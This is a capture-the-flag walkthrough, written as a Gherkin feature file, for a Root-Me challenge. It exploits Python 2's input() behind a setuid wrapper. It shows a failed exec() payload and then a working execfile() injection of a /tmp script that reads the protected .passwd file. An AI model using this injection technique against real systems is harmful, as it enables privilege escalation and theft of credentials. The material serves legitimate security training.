## Version 2.0
## language: en

Feature:
  Site:
    www.root-me.org
  Category:
    bash
    scripting
  User:
    bianfa
  Goal:
    Get the password from .passwd file

 Background:
   Hacker's software:
     | <Software name> | <Version>     |
     | Kali Linux      | 2020.3        |
     | Firefox         | 68.10.0esr    |
     | SSH             | OpenSSH_8.3p1 |

 Machine information:
   Given the challenge URL
   """
   https://www.root-me.org/en/Challenges/App-Script/Python-input
   """
   When I open this URL with Firefox
   Then I see some credentials to access a machine via SSH
   And I enter by console in Kali with the credentials
   Then I see some info
   """
   ----------------

   Welcome on challenge02    /

   -----------------------------

   /tmp and /var/tmp are writeable
   ----------------

   Challenge information    /

   -----------------------------

   Use the ./setuid-wrapper to get the right privileges.
   """
   When I run 'ls -a'
   Then I see the following four files
   """
   ch6.py .motd .passwd setuid-wrapper setuid-wrapper.c
   """
   When I run 'cat' command to 'setuid-wrapper.c' file
   Then I see that 'setuid-wrapper' run 'ch6.py' with privileges
   """
   #include <stdlib.h>
   #include <unistd.h>
   #include <sys/types.h>

   /* setuid script wrapper */

   int main()
   {
    setreuid(geteuid(), geteuid());
    system("/challenge/app-script/ch6/ch6.py");
    return 0;
   }
   """

 Scenario: Fail:Attempt-use-exec
   Given the code from 'ch6.py'
   """
   #!/usr/bin/python2

   import sys

   def youLose():
    print "Try again ;-)"
    sys.exit(1)

   try:
    p = input("Please enter password : ")
   except:
    youLose()

   with open(".passwd") as f:
    passwd = f.readline().strip()
    try:
     if (p == int(passwd)):
      print "Well done ! You can validate with this password !"
    except:
     youLose()
   """
   When I run '~/setuid-wrapper'
   Then I see the following request
   """
   Please enter password :
   """
   And I enter the following line
   """
   exec("print(open("/challenge/app-script/ch6/.passwd").readline())")
   """
   Then I get
   """
   Try again ;-)
   """

 Scenario: Success:use-execfile
   When I create the folder 'scripts' in '/tmp'
   Then I change directory to '/tmp/scripts'
   And I create the file 'myScript.py' in '/tmp/scripts'
   Then I run nano './myScript.py' for add the follow code
   """
   print open("/challenge/app-script/ch6/.passwd").readline()
   """
   When I run '~/setuid-wrapper' again
   Then I enter the following line
   """
   execfile('/tmp/scripts/myScript.py')
   """
   And I get the flag
